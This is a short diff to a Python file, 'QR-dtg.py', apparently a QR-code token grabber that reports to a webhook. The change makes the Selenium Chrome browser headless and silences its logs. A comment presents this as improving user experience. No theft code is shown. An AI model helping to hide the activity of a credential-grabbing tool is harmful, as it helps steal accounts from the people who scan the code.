QR-dtg.py

```diff
@@ -49,6 +47,9 @@ def main(webhook_url) -> None:
     webdriver.ChromeOptions.binary_location = r"browser/chrome.exe"
     opts = webdriver.ChromeOptions()
     opts.add_experimental_option("detach", True)
+    opts.add_experimental_option('excludeSwitches', ['enable-logging'])
+    opts.headless = True
+    opts.add_argument('--log-level 3') 
```

Comment:
Skipping all selenium and chromedriver logs and hiding the chromdriver window to give the best user experience.